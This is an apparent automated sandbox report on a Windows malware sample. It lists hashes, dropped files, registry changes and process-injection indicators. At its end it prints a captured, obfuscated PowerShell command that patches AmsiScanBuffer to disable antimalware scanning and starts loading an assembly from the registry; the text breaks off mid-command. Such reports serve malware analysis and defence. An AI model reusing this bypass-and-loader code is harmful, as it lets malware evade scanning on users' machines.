73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944

Analysis

max time kernel
264s
max time network
181s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
16-01-2023 04:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
Size

3.8MB
MD5

8e9509369f821b09d81b5c3305fba76f
SHA1

79717c039c61d8dafa748f62e949eefe9b019c0b
SHA256

73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944
SHA512

517b9377f07f5faf68f684b647cefbdfa0c423ab3842fdd85f4d5abb367fa1abd7bfa6ed7282ce32777cc70049223f298ff713231d9f78bfab06ee1f5d4e5e2a
SSDEEP

98304:uGbIlvAq+fTmM2xntJa7IwQBwTDxINNqv4p:1bIlvAnynLW5Qk8

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 688 created 3756	688	WerFault.exe	48

Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs

description	pid	Process	procid_target
PID 3540 created 2112	3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe	50
PID 3540 created 2112	3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe	50
PID 3540 created 2112	3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe	50
PID 3540 created 2112	3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe	50
PID 3540 created 2112	3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe	50
PID 3984 created 568	3984	powershell.EXE	3
PID 3524 created 3916	3524	svchost.exe	46
PID 3524 created 3756	3524	svchost.exe	48
PID 3524 created 3756	3524	svchost.exe	48

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3540 set thread context of 4100	3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe	78
PID 3984 set thread context of 580	3984	powershell.EXE	86

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\WinDefender\SecurityHealthSystray.exe	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
3996	3756	WerFault.exe	48
3616	3916	WerFault.exe	46
688	3756	WerFault.exe	48

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 16 Jan 2023 04:18:52 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
3832	powershell.exe
3832	powershell.exe
3832	powershell.exe
3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
4324	powershell.exe
4324	powershell.exe
4324	powershell.exe
3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
2276	powershell.exe
2276	powershell.exe
2276	powershell.exe
3984	powershell.EXE
3984	powershell.EXE
3984	powershell.EXE
4840	powershell.EXE
3984	powershell.EXE
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
580	dllhost.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3616	WerFault.exe
3996	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2112	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeIncreaseQuotaPrivilege	3832	powershell.exe
Token: SeSecurityPrivilege	3832	powershell.exe
Token: SeTakeOwnershipPrivilege	3832	powershell.exe
Token: SeLoadDriverPrivilege	3832	powershell.exe
Token: SeSystemProfilePrivilege	3832	powershell.exe
Token: SeSystemtimePrivilege	3832	powershell.exe
Token: SeProfSingleProcessPrivilege	3832	powershell.exe
Token: SeIncBasePriorityPrivilege	3832	powershell.exe
Token: SeCreatePagefilePrivilege	3832	powershell.exe
Token: SeBackupPrivilege	3832	powershell.exe
Token: SeRestorePrivilege	3832	powershell.exe
Token: SeShutdownPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeSystemEnvironmentPrivilege	3832	powershell.exe
Token: SeRemoteShutdownPrivilege	3832	powershell.exe
Token: SeUndockPrivilege	3832	powershell.exe
Token: SeManageVolumePrivilege	3832	powershell.exe
Token: 33	3832	powershell.exe
Token: 34	3832	powershell.exe
Token: 35	3832	powershell.exe
Token: 36	3832	powershell.exe
Token: SeShutdownPrivilege	3500	powercfg.exe
Token: SeCreatePagefilePrivilege	3500	powercfg.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeShutdownPrivilege	5048	powercfg.exe
Token: SeCreatePagefilePrivilege	5048	powercfg.exe
Token: SeShutdownPrivilege	4432	powercfg.exe
Token: SeCreatePagefilePrivilege	4432	powercfg.exe
Token: SeShutdownPrivilege	4080	powercfg.exe
Token: SeCreatePagefilePrivilege	4080	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4324	powershell.exe
Token: SeSecurityPrivilege	4324	powershell.exe
Token: SeTakeOwnershipPrivilege	4324	powershell.exe
Token: SeLoadDriverPrivilege	4324	powershell.exe
Token: SeSystemProfilePrivilege	4324	powershell.exe
Token: SeSystemtimePrivilege	4324	powershell.exe
Token: SeProfSingleProcessPrivilege	4324	powershell.exe
Token: SeIncBasePriorityPrivilege	4324	powershell.exe
Token: SeCreatePagefilePrivilege	4324	powershell.exe
Token: SeBackupPrivilege	4324	powershell.exe
Token: SeRestorePrivilege	4324	powershell.exe
Token: SeShutdownPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeSystemEnvironmentPrivilege	4324	powershell.exe
Token: SeRemoteShutdownPrivilege	4324	powershell.exe
Token: SeUndockPrivilege	4324	powershell.exe
Token: SeManageVolumePrivilege	4324	powershell.exe
Token: 33	4324	powershell.exe
Token: 34	4324	powershell.exe
Token: 35	4324	powershell.exe
Token: 36	4324	powershell.exe
Token: SeIncreaseQuotaPrivilege	4324	powershell.exe
Token: SeSecurityPrivilege	4324	powershell.exe
Token: SeTakeOwnershipPrivilege	4324	powershell.exe
Token: SeLoadDriverPrivilege	4324	powershell.exe
Token: SeSystemProfilePrivilege	4324	powershell.exe
Token: SeSystemtimePrivilege	4324	powershell.exe
Token: SeProfSingleProcessPrivilege	4324	powershell.exe
Token: SeIncBasePriorityPrivilege	4324	powershell.exe
Token: SeCreatePagefilePrivilege	4324	powershell.exe
Token: SeBackupPrivilege	4324	powershell.exe
Token: SeRestorePrivilege	4324	powershell.exe
Token: SeShutdownPrivilege	4324	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
988	dwm.exe
988	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2392 wrote to memory of 3500	2392	cmd.exe	73
PID 2392 wrote to memory of 3500	2392	cmd.exe	73
PID 2392 wrote to memory of 5048	2392	cmd.exe	74
PID 2392 wrote to memory of 5048	2392	cmd.exe	74
PID 2392 wrote to memory of 4432	2392	cmd.exe	75
PID 2392 wrote to memory of 4432	2392	cmd.exe	75
PID 2392 wrote to memory of 4080	2392	cmd.exe	76
PID 2392 wrote to memory of 4080	2392	cmd.exe	76
PID 3540 wrote to memory of 4100	3540	73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe	78
PID 2276 wrote to memory of 4632	2276	powershell.exe	84
PID 2276 wrote to memory of 4632	2276	powershell.exe	84
PID 3984 wrote to memory of 580	3984	powershell.EXE	86
PID 3984 wrote to memory of 580	3984	powershell.EXE	86
PID 3984 wrote to memory of 580	3984	powershell.EXE	86
PID 3984 wrote to memory of 580	3984	powershell.EXE	86
PID 3984 wrote to memory of 580	3984	powershell.EXE	86
PID 3984 wrote to memory of 580	3984	powershell.EXE	86
PID 3984 wrote to memory of 580	3984	powershell.EXE	86
PID 3984 wrote to memory of 580	3984	powershell.EXE	86
PID 3984 wrote to memory of 580	3984	powershell.EXE	86
PID 580 wrote to memory of 568	580	dllhost.exe	3
PID 580 wrote to memory of 624	580	dllhost.exe	1
PID 580 wrote to memory of 720	580	dllhost.exe	8
PID 580 wrote to memory of 900	580	dllhost.exe	11
PID 580 wrote to memory of 988	580	dllhost.exe	12
PID 580 wrote to memory of 336	580	dllhost.exe	13
PID 580 wrote to memory of 356	580	dllhost.exe	16
PID 580 wrote to memory of 384	580	dllhost.exe	17
PID 580 wrote to memory of 1032	580	dllhost.exe	19
PID 580 wrote to memory of 1096	580	dllhost.exe	20
PID 580 wrote to memory of 1132	580	dllhost.exe	21
PID 580 wrote to memory of 1208	580	dllhost.exe	22
PID 580 wrote to memory of 1216	580	dllhost.exe	23
PID 580 wrote to memory of 1292	580	dllhost.exe	24
PID 580 wrote to memory of 1332	580	dllhost.exe	25
PID 580 wrote to memory of 1388	580	dllhost.exe	26
PID 580 wrote to memory of 1400	580	dllhost.exe	27
PID 580 wrote to memory of 1460	580	dllhost.exe	28
PID 580 wrote to memory of 1468	580	dllhost.exe	29
PID 580 wrote to memory of 1572	580	dllhost.exe	30
PID 580 wrote to memory of 1604	580	dllhost.exe	31
PID 580 wrote to memory of 1624	580	dllhost.exe	32
PID 580 wrote to memory of 1732	580	dllhost.exe	34
PID 580 wrote to memory of 1740	580	dllhost.exe	33
PID 580 wrote to memory of 1756	580	dllhost.exe	35
PID 580 wrote to memory of 1852	580	dllhost.exe	36
PID 580 wrote to memory of 1912	580	dllhost.exe	64
PID 580 wrote to memory of 1972	580	dllhost.exe	63
PID 580 wrote to memory of 1984	580	dllhost.exe	62
PID 580 wrote to memory of 2172	580	dllhost.exe	61
PID 580 wrote to memory of 2384	580	dllhost.exe	60
PID 580 wrote to memory of 2408	580	dllhost.exe	59
PID 580 wrote to memory of 2428	580	dllhost.exe	37
PID 580 wrote to memory of 2452	580	dllhost.exe	58
PID 580 wrote to memory of 2460	580	dllhost.exe	57
PID 580 wrote to memory of 2596	580	dllhost.exe	56
PID 580 wrote to memory of 2612	580	dllhost.exe	55
PID 580 wrote to memory of 2624	580	dllhost.exe	54
PID 580 wrote to memory of 2668	580	dllhost.exe	53
PID 580 wrote to memory of 2680	580	dllhost.exe	52
PID 580 wrote to memory of 2696	580	dllhost.exe	38
PID 580 wrote to memory of 2740	580	dllhost.exe	51
PID 580 wrote to memory of 2112	580	dllhost.exe	50
PID 580 wrote to memory of 3512	580	dllhost.exe	40

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:624

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:568
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:988
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4e3c2ad1-f9a5-4d69-9605-4e6e2dde21ca}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:580

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:720

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:900

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:336

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:384

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1032
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2740
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:sXDGQvfjsLPs{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tSqhvbTMbEjdtK,[Parameter(Position=1)][Type]$gJdKxqBbHA)$bMkLnfnIuwY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+'yMo'+'d'+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+'D'+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](83)+''+'e'+''+'a'+''+[Char](108)+'ed'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+'C'+[Char](108)+''+[Char](97)+'s'+'s'+''+','+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+'Cl'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$bMkLnfnIuwY.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+'yS'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$tSqhvbTMbEjdtK).SetImplementationFlags('R'+'u'+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');$bMkLnfnIuwY.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+'b'+'l'+'ic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+'B'+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+[Char](101)+'wS'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'Vi'+[Char](114)+''+'t'+'u'+'a'+''+[Char](108)+'',$gJdKxqBbHA,$tSqhvbTMbEjdtK).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $bMkLnfnIuwY.CreateType();}$JJoByBiwFUDXN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+'te'+[Char](109)+''+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+'f'+'t'+'.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'J'+''+[Char](74)+''+[Char](111)+'By'+[Char](66)+''+'i'+''+[Char](119)+''+'F'+''+'U'+''+'D'+'X'+[Char](78)+'');$oxdELxuvLWvzku=$JJoByBiwFUDXN.GetMethod(''+[Char](111)+''+'x'+'d'+'E'+''+[Char](76)+''+[Char](120)+''+'u'+''+[Char](118)+''+[Char](76)+''+[Char](87)+''+[Char](118)+''+'z'+''+'k'+''+[Char](117)+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+'atic',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ymewNcXBqQlMMbfcwGo=sXDGQvfjsLPs @([String])([IntPtr]);$mttOKgpvOLljjkrIvsWeNq=sXDGQvfjsLPs @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OAOgIwSXQsf=$JJoByBiwFUDXN.GetMethod('G'+'e'+''+[Char](116)+'M'+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$unJkVGsWcOtTeR=$oxdELxuvLWvzku.Invoke($Null,@([Object]$OAOgIwSXQsf,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+'i'+[Char](98)+''+'r'+''+'a'+''+'r'+''+'y'+''+[Char](65)+'')));$SJDUBaqHAsnNGEFQr=$oxdELxuvLWvzku.Invoke($Null,@([Object]$OAOgIwSXQsf,[Object](''+'V'+''+'i'+'rt'+'u'+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+'o'+'t'+[Char](101)+'c'+[Char](116)+'')));$niOEXIu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($unJkVGsWcOtTeR,$ymewNcXBqQlMMbfcwGo).Invoke('am'+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$mPzwPzjPDesJcmoRe=$oxdELxuvLWvzku.Invoke($Null,@([Object]$niOEXIu,[Object]('Am'+[Char](115)+''+[Char](105)+'S'+'c'+'a'+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+'er')));$vAkgvKVOiu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SJDUBaqHAsnNGEFQr,$mttOKgpvOLljjkrIvsWeNq).Invoke($mPzwPzjPDesJcmoRe,[uint32]8,4,[ref]$vAkgvKVOiu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$mPzwPzjPDesJcmoRe,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SJDUBaqHAsnNGEFQr,$mttOKgpvOLljjkrIvsWeNq).Invoke($mPzwPzjPDesJcmoRe,[uint32]8,0x20,[ref]$vAkgvKVOiu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+'i'+'a'+